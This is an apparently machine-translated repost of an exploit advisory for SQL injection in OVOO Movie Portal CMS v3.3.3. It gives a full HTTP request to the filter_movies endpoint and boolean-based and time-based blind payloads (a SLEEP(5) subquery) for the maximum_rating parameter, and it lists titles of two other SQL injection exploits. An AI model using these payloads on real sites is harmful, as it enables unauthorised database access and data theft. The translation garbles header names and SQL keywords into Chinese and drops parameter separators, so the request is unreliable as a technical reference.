OVOO电影门户CMS v3.3.3 -SQL注入

[HackApt-37 Team已验证会员]

＃利用标题: OVOO电影门户CMS v3.3.3 -SQL注入
＃日期: 2023-08-12
＃利用作者: ahmetümitBayram
＃vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
＃在: Kali Linux MacOS上测试
＃CVE: N/A。
＃＃＃ 要求＃＃＃
post/filter_movies/1 http/2
HOST: LOCALHOST
cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
用户代理: Mozilla/5.0（Macintosh; Intel Mac OS X 10.15; RV:109.0）
壁虎/20100101 Firefox/116.0
ACCEPT:应用程序/JSON，text/javaScript， /; Q=0.01
Accept-Language: TR-TR，TR; Q=0.8，EN-US; Q=0.5，en; q=0.3
Accept-incoding: Gzip，放气
Referer: http://localhost/Movie.html
content-type:应用程序/x-www-form-urlenCoded; charset=UTF-8
X-重新要求- WITH: XMLHTTPREQUEST
内容长度: 60
Origin: HTTPS: //Localhost
sec-fetch-Dest:空
sec-fetch mode: cors
sec-fetch-site:相同原产
TE:拖车
操作=fetch_dataminimum_rating=1maximum_rating=6.8page=1
###参数有效载荷###
参数:最大值_rating（post）
Type:基于布尔的盲人
title:和基于布尔的盲人- 在哪里或有子句
PAYLOAD:操作=fetch_dataminimum_rating=1maximum_rating=6.8和
2238=2238page=1
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人（查询睡眠）
payload:操作=fetch_dataminimum_rating=1maximum_rating=6.8和（选择
4101来自（Select（Sleep（5）））FLWC）页=1

 

H

TaskHub CRM工具2.8.6 -SQL注入

H

全球- 多学校管理系统Express V1.0 -SQL注入